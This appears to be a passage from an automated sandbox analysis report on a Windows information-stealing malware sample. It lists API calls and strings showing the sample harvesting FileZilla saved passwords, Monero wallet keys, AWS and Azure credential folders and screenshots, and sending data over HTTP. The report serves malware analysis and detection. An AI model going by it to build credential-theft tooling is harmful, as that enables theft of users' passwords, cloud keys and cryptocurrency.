                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C00393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C003CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C003DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00C00419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C00427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C00463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C00475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C00502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C0051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C00532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C0054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C00562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00C00571
                          • lstrcat.KERNEL32(?,url: ), ref: 00C00580
                          • lstrcat.KERNEL32(?,00000000), ref: 00C00593
                          • lstrcat.KERNEL32(?,00C11678), ref: 00C005A2
                          • lstrcat.KERNEL32(?,00000000), ref: 00C005B5
                          • lstrcat.KERNEL32(?,00C1167C), ref: 00C005C4
                          • lstrcat.KERNEL32(?,login: ), ref: 00C005D3
                          • lstrcat.KERNEL32(?,00000000), ref: 00C005E6
                          • lstrcat.KERNEL32(?,00C11688), ref: 00C005F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00C00604
                          • lstrcat.KERNEL32(?,00000000), ref: 00C00617
                          • lstrcat.KERNEL32(?,00C11698), ref: 00C00626
                          • lstrcat.KERNEL32(?,00C1169C), ref: 00C00635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C0068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 5abc9262000b05a5dd66a2612ce592531e0e797a4c3783de84374b7b508f9aac
                          • Instruction ID: 415e68665f01092bcc748b80a9e63a5049b398be078ac4cdc764a28f67815741
                          • Opcode Fuzzy Hash: 5abc9262000b05a5dd66a2612ce592531e0e797a4c3783de84374b7b508f9aac
                          • Instruction Fuzzy Hash: 3CD100719002089FDB04EBF4DD9AEEE7778EF54300F548528F602B60D1DE75AA4AEB61
                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BF4839
                            • Part of subcall function 00BF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BF4849
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BF59F8
                          • StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF5A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF5B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,006EE440,00000000,?,006E9D28,00000000,?,00C11A1C), ref: 00BF5E71
                          • lstrlen.KERNEL32(00000000), ref: 00BF5E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00BF5E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BF5E9A
                          • lstrlen.KERNEL32(00000000), ref: 00BF5EAF
                          • lstrlen.KERNEL32(00000000), ref: 00BF5ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BF5EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00BF5F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BF5F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BF5F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00BF5FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00BF5FBD
                          • HttpOpenRequestA.WININET(00000000,006EE5B0,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF5BF8
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • InternetCloseHandle.WININET(00000000), ref: 00BF5FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------$@n
                          • API String ID: 874700897-1388741518
                          • Opcode ID: bbad246a503ac77b5da5f408dc24bb3011377b0ae24b4089afc47dc4309101f5
                          • Instruction ID: cbb66e4f46c1699d9a380d7a9c7a58dc9f4df7e4af8ce8d3f56971f5048c02ac
                          • Opcode Fuzzy Hash: bbad246a503ac77b5da5f408dc24bb3011377b0ae24b4089afc47dc4309101f5
                          • Instruction Fuzzy Hash: 2A12CE71920218ABDB15EBA0DC95FEEB378BF14700F5442A9F106720D1EF706A89DF65
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C08B60: GetSystemTime.KERNEL32(00C10E1A,006E9B18,00C105AE,?,?,00BF13F9,?,0000001A,00C10E1A,00000000,?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C08B86
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BFCF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BFD0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BFD0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD208
                          • lstrcat.KERNEL32(?,00C11478), ref: 00BFD217
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD22A
                          • lstrcat.KERNEL32(?,00C1147C), ref: 00BFD239
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD24C
                          • lstrcat.KERNEL32(?,00C11480), ref: 00BFD25B
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD26E
                          • lstrcat.KERNEL32(?,00C11484), ref: 00BFD27D
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD290
                          • lstrcat.KERNEL32(?,00C11488), ref: 00BFD29F
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD2B2
                          • lstrcat.KERNEL32(?,00C1148C), ref: 00BFD2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD2D4
                          • lstrcat.KERNEL32(?,00C11490), ref: 00BFD2E3
                            • Part of subcall function 00C0A820: lstrlen.KERNEL32(00BF4F05,?,?,00BF4F05,00C10DDE), ref: 00C0A82B
                            • Part of subcall function 00C0A820: lstrcpy.KERNEL32(00C10DDE,00000000), ref: 00C0A885
                          • lstrlen.KERNEL32(?), ref: 00BFD32A
                          • lstrlen.KERNEL32(?), ref: 00BFD339
                            • Part of subcall function 00C0AA70: StrCmpCA.SHLWAPI(006E88C0,00BFA7A7,?,00BFA7A7,006E88C0), ref: 00C0AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 00BFD3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 04b43aa2d07115db67ef736c79fc1888342b4f79baa3ac7c40b5f307d1622a92
                          • Instruction ID: fda0b3e3da6594a215bddaf3c1f07776b33512477c8f2cd963abfb92aa8fa10b
                          • Opcode Fuzzy Hash: 04b43aa2d07115db67ef736c79fc1888342b4f79baa3ac7c40b5f307d1622a92
                          • Instruction Fuzzy Hash: 0DE11E71910208AFCB04EBA1DD9AEEE7778BF14301F144168F647B70D1DE35AA49EB62
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006ECFC0,00000000,?,00C1144C,00000000,?,?), ref: 00BFCA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BFCA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00BFCA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BFCAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BFCAD9
                          • StrStrA.SHLWAPI(?,006ECE10,00C10B52), ref: 00BFCAF7
                          • StrStrA.SHLWAPI(00000000,006ECE28), ref: 00BFCB1E
                          • StrStrA.SHLWAPI(?,006ED6B8,00000000,?,00C11458,00000000,?,00000000,00000000,?,006E8980,00000000,?,00C11454,00000000,?), ref: 00BFCCA2
                          • StrStrA.SHLWAPI(00000000,006ED478), ref: 00BFCCB9
                            • Part of subcall function 00BFC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BFC871
                            • Part of subcall function 00BFC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BFC87C
                          • StrStrA.SHLWAPI(?,006ED478,00000000,?,00C1145C,00000000,?,00000000,006E8990), ref: 00BFCD5A
                          • StrStrA.SHLWAPI(00000000,006E8B50), ref: 00BFCD71
                            • Part of subcall function 00BFC820: lstrcat.KERNEL32(?,00C10B46), ref: 00BFC943
                            • Part of subcall function 00BFC820: lstrcat.KERNEL32(?,00C10B47), ref: 00BFC957
                            • Part of subcall function 00BFC820: lstrcat.KERNEL32(?,00C10B4E), ref: 00BFC978
                          • lstrlen.KERNEL32(00000000), ref: 00BFCE44
                          • CloseHandle.KERNEL32(00000000), ref: 00BFCE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: a5915517f1cdb750e4a2786cb87202dd1a2831f902425553dfac0694aec15569
                          • Instruction ID: da578603c0f12a871967e8b8e65e8a0430a30ead70304d9ce0e9a98e002bacfe
                          • Opcode Fuzzy Hash: a5915517f1cdb750e4a2786cb87202dd1a2831f902425553dfac0694aec15569
                          • Instruction Fuzzy Hash: E8E1E971910208ABDB14EBA5DC96FEEB778AF14300F448169F106771D1EF346A8ADF62
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • RegOpenKeyExA.ADVAPI32(00000000,006EACE0,00000000,00020019,00000000,00C105B6), ref: 00C083A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C08426
                          • wsprintfA.USER32 ref: 00C08459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C0847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C0848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C08499
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: eb17c2ee8c6909f4c2eac921d68385de85bbbccc576e666106ea72f5d7c03465
                          • Instruction ID: c66c8b663557203182071ac437656e1aafe3caeb48dc363c1fba64e479a4e31e
                          • Opcode Fuzzy Hash: eb17c2ee8c6909f4c2eac921d68385de85bbbccc576e666106ea72f5d7c03465
                          • Instruction Fuzzy Hash: 5781FC7191021CAFDB28DB54CD95FEAB7B8BF58700F00C299E149A6180DF716B89DF91
                          APIs
                            • Part of subcall function 00C08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00C04DCD
                            • Part of subcall function 00C04910: wsprintfA.USER32 ref: 00C0492C
                            • Part of subcall function 00C04910: FindFirstFileA.KERNEL32(?,?), ref: 00C04943
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00C04E59
                            • Part of subcall function 00C04910: StrCmpCA.SHLWAPI(?,00C10FDC), ref: 00C04971
                            • Part of subcall function 00C04910: StrCmpCA.SHLWAPI(?,00C10FE0), ref: 00C04987
                            • Part of subcall function 00C04910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C04B7D
                            • Part of subcall function 00C04910: FindClose.KERNEL32(000000FF), ref: 00C04B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C04EE5
                            • Part of subcall function 00C04910: wsprintfA.USER32 ref: 00C049B0
                            • Part of subcall function 00C04910: StrCmpCA.SHLWAPI(?,00C108D2), ref: 00C049C5
                            • Part of subcall function 00C04910: wsprintfA.USER32 ref: 00C049E2
                            • Part of subcall function 00C04910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C04A1E
                            • Part of subcall function 00C04910: lstrcat.KERNEL32(?,006EE4A0), ref: 00C04A4A
                            • Part of subcall function 00C04910: lstrcat.KERNEL32(?,00C10FF8), ref: 00C04A5C
                            • Part of subcall function 00C04910: lstrcat.KERNEL32(?,?), ref: 00C04A70
                            • Part of subcall function 00C04910: lstrcat.KERNEL32(?,00C10FFC), ref: 00C04A82
                            • Part of subcall function 00C04910: lstrcat.KERNEL32(?,?), ref: 00C04A96
                            • Part of subcall function 00C04910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C04AAC
                            • Part of subcall function 00C04910: DeleteFileA.KERNEL32(?), ref: 00C04B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 99836cd3042674fdfa4dc515246ad0f6986f7d6648bafd39e8ca2d22fc5bb67a
                          • Instruction ID: 39d8fb57eb016a1e5c0b4303b63b70ba35ad8ac94ad038bb259a00dafdd523a0
                          • Opcode Fuzzy Hash: 99836cd3042674fdfa4dc515246ad0f6986f7d6648bafd39e8ca2d22fc5bb67a
                          • Instruction Fuzzy Hash: 5E4184B994030866CB54F770EC8BFED3738AB25700F4449A4B685660C1EDB59BCDEB92
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C0906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: e9ab63bbd7f724bb2436f4f3e4f7545692f206f0398b54df17004e578dae26b7
                          • Instruction ID: f407b9327a4bc16ce6b2eeea824d0a6434279caaa970f43b5758a50fd39baf7a
                          • Opcode Fuzzy Hash: e9ab63bbd7f724bb2436f4f3e4f7545692f206f0398b54df17004e578dae26b7
                          • Instruction Fuzzy Hash: 2571DB71A10208AFDB04DBE5DC89FEEBBB8AF48700F148518F655A7290DB35A949CB61
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00C031C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00C0335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00C034EA
                          Strings
                          Memory Dump Source
